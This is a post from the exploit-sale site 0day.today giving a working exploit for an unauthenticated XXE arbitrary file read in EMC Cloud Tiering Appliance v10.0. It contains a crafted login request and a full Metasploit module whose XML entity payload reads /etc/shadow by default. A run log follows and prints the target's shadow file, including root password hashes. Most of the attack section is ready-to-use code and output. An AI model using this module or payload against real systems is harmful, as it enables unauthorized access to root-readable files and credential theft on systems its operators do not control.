0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read
EMC Cloud Tiering Appliance v10.0 Unauthed XXE The following authentication request is susceptible to an XXE attack: POST /api/login HTTP/1.1 Host: 172.31.16.99 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=12818F1AC5C744CF444B2683ABF6E8AC Connection: keep-alive Referer: https://172.31.16.99/UxFramework/UxFlashApplication.swf Content-Type: application/x-www-form-urlencoded Content-Length: 213 <Request> <Username>root</Username> <Password>114,97,105,110</Password> </Request> -------------------------------------------- The following metasploit module will exploit this to read an arbitrary file from the file system: # This module requires Metasploit: http//metasploit.com/download ## # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'EMC CTA Unauthenticated XXE Arbitrary File Read', 'Description' => %q{ EMC CTA v10.0 is susceptible to an unauthenticated XXE attack that allows an attacker to read arbitrary files from the file system with the permissions of the root user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile@gmail.com>', #metasploit module ], 'References' => [ ], 'DisclosureDate' => 'Mar 31 2014' )) register_options( [ OptString.new('TARGETURI', [ true, "Base directory path", '/']), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]), ], self.class) end def run pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}" >]> <Request> <Username>root</Username> <Password>&xxe;</Password> </Request> } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'api', 'login'), 'method' => 'POST', 'data' => pay }) file = /For input string: "(.*)"/m.match(res.body) file = file[1] path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH']) print_good("File saved to: " + path) end end ---------------------------------------------------------------- Quick run: msf auxiliary(emc_cta_xxe) > show options Module options (auxiliary/gather/emc_cta_xxe): Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH /etc/shadow yes The filepath to read on the server Proxies http:127.0.0.1:8080 no Use a proxy chain RHOST 172.31.16.99 yes The target address RPORT 443 yes The target port TARGETURI / yes Base directory path VHOST no HTTP server virtual host msf auxiliary(emc_cta_xxe) > run [+] File saved to: /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt [*] Auxiliary module execution completed msf auxiliary(emc_cta_xxe) > cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt [*] exec: cat /home/bperry/.msf4/loot/20140331082903_default_172.31.16.99_emc.file_935159.txt root:u4sA.C2vNqNF.:15913:::::: bin:*:15913:0:99999:0:0:: daemon:*:15913:0:99999:0:0:: lp:*:15913:0:99999:0:0:: mail:*:15913:0:99999:0:0:: news:*:15913:0:99999:0:0:: uucp:*:15913:0:99999:0:0:: man:*:15913:0:99999:0:0:: wwwrun:*:15913:0:99999:0:0:: ftp:*:15913:0:99999:0:0:: nobody:*:15913:0:99999:0:0:: messagebus:*:15913:0:99999:0:0:: polkituser:*:15913:0:99999:0:0:: haldaemon:*:15913:0:99999:0:0:: sshd:*:15913:0:99999:0:0:: uuidd:*:15913:0:99999:0:0:: postgres:*:15913:0:99999:0:0:: ntp:*:15913:0:99999:0:0:: suse-ncc:*:15913:0:99999:0:0:: super:u4sA.C2vNqNF.:15913:0:99999:0:0:: msf auxiliary(emc_cta_xxe) > # 0day.today [2024-12-24] #